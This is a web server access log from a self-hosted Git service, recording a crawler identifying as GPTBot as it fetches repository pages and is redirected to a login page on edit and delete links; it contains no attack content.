"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:16:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 819487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 749901] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 749876] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 722321] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:16:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 749435] [Gzip 27.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:16:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 749403] [Gzip 27.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:16:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 722294] [Gzip 27.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:16:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 749908] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 788394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:16:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 788394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:16:41:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 819487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 819599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:16:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 819487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 819599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:16:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=C%23&q=&sort=recentupdate&tab=repositories" [Client 74.7.227.38] [Length 7796] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:16:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" +[17/Feb/2026:16:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" +[17/Feb/2026:16:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" +[17/Feb/2026:16:41:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:16:41:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:16:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" +[17/Feb/2026:16:41:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:16:41:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:16:41:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:16:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 14185] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:16:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 16213] [Gzip 2.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11637] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11575] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:16:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" +[17/Feb/2026:16:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" +[17/Feb/2026:16:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" +[17/Feb/2026:16:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 20598] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 14517] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10989] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:41:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:41:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:41:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:41:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:16:41:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:41:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 9810] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" +[17/Feb/2026:16:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10049] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 13553] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 